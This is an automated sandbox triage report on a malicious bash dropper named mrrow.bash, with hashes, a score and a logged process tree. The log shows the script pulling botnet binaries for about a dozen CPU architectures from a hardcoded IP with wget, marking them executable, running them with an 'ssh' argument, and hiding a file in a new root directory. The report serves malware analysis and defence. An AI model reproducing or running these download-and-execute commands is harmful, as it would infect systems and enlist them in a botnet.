2db0ba4efda0653533e32abca1417cafb84f58322dc8d4df183e64771626b826 | Triage

Resubmissions

09-08-2022 19:31

220809-x8ezrafabp 5

09-08-2022 19:22

220809-x28cqaehdq 5

09-08-2022 19:21

220809-x2ny3sgec6 5

Analysis

max time kernel
0s
max time network
1147s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
09-08-2022 19:31

Sharing

Report Analysis Logs

General

Target

mrrow.bash
Size

2KB
MD5

9486bdff70b6ec6243b012a91e90c21e
SHA1

2364e70ee0d49e4e641fa7428958f5907a8c26a3
SHA256

2db0ba4efda0653533e32abca1417cafb84f58322dc8d4df183e64771626b826
SHA512

e64e2324c403d967d3d04140bb0eba159e57b83db09fdd50e882a8edc595211837505c86c1d44a65d11b9c3a34c0d02496b3c06f264e1175e248397e9716b4bd

Score

5^/10

Malware Config

Signatures

Reads runtime system information 3 IoCs
Reads data from /proc virtual filesystem.

Processes:

mkdirmv

description ioc

/proc/643/exe /proc/643/exe
/proc/filesystems /proc/filesystems mkdir
/proc/filesystems /proc/filesystems mv
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

mrrow.bash

description ioc process

/tmp/mrrow.bash /tmp/mrrow.bash mrrow.bash

/tmp/mrrow.bash
/tmp/mrrow.bash
1⤵
- Writes file to tmp directory
PID:571

/usr/bin/wget
wget http://109.206.241.211/bins/bot.mips
2⤵
PID:572

/bin/cat
cat bot.mips
2⤵
PID:574

/bin/chmod
chmod +x bot.mips fuwwyowo mrrow.bash systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
2⤵
PID:575

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:576

/usr/bin/wget
wget http://109.206.241.211/bins/bot.mpsl
2⤵
PID:578

/bin/cat
cat bot.mpsl
2⤵
PID:580

/bin/chmod
chmod +x bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
2⤵
PID:584

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:587

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm
2⤵
PID:589

/bin/cat
cat bot.arm
2⤵
PID:591

/bin/chmod
chmod +x bot.arm bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
2⤵
PID:592

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:593

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm5
2⤵
PID:595

/bin/cat
cat bot.arm5
2⤵
PID:597

/bin/chmod
chmod +x bot.arm bot.arm5 bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
2⤵
PID:598

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:599

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm6
2⤵
PID:601

/bin/cat
cat bot.arm6
2⤵
PID:603

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
2⤵
PID:604

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:605

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm7
2⤵
PID:607

/bin/cat
cat bot.arm7
2⤵
PID:609

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.arm7 bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
2⤵
PID:610

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:611

/usr/bin/wget
wget http://109.206.241.211/bins/bot.ppc
2⤵
PID:613

/bin/cat
cat bot.ppc
2⤵
PID:615

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.arm7 bot.mips bot.mpsl bot.ppc fuwwyowo mrrow.bash systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
2⤵
PID:616

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:617

/usr/bin/wget
wget http://109.206.241.211/bins/bot.m68k
2⤵
PID:619

/bin/cat
cat bot bot.m68k
2⤵
PID:621

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.arm7 bot.m68k bot.mips bot.mpsl bot.ppc fuwwyowo mrrow.bash systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
2⤵
PID:622

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:623

/usr/bin/wget
wget http://109.206.241.211/bins/bot.sh4
2⤵
PID:625

/bin/cat
cat bot.sh4
2⤵
PID:627

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.arm7 bot.m68k bot.mips bot.mpsl bot.ppc bot.sh4 fuwwyowo mrrow.bash systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
2⤵
PID:628

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:629

/usr/bin/wget
wget http://109.206.241.211/bins/bot.spc
2⤵
PID:631

/bin/cat
cat bot.spc
2⤵
PID:633

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.arm7 bot.m68k bot.mips bot.mpsl bot.ppc bot.sh4 bot.spc fuwwyowo mrrow.bash systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
2⤵
PID:634

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:635

/usr/bin/wget
wget http://109.206.241.211/bins/bot.x86_64
2⤵
PID:637

/bin/cat
cat bot.x86_64
2⤵
PID:639

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.arm7 bot.m68k bot.mips bot.mpsl bot.ppc bot.sh4 bot.spc bot.x86_64 fuwwyowo mrrow.bash systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y
2⤵
PID:640

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:641

/bin/sh
sh -c "mkdir /vwpq7uxkds/ && >/vwpq7uxkds/vwpq7uxkds && cd /vwpq7uxkds/ >/dev/null"
1⤵
PID:644

/bin/mkdir
mkdir /vwpq7uxkds/
2⤵
- Reads runtime system information
PID:645

/bin/sh
sh -c "mv /tmp/fuwwyowo /vwpq7uxkds/vwpq7uxkds && chmod 777 /vwpq7uxkds/vwpq7uxkds >/dev/null"
1⤵
PID:646

/bin/mv
mv /tmp/fuwwyowo /vwpq7uxkds/vwpq7uxkds
2⤵
- Reads runtime system information
PID:647

/bin/chmod
chmod 777 /vwpq7uxkds/vwpq7uxkds
2⤵
PID:648

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...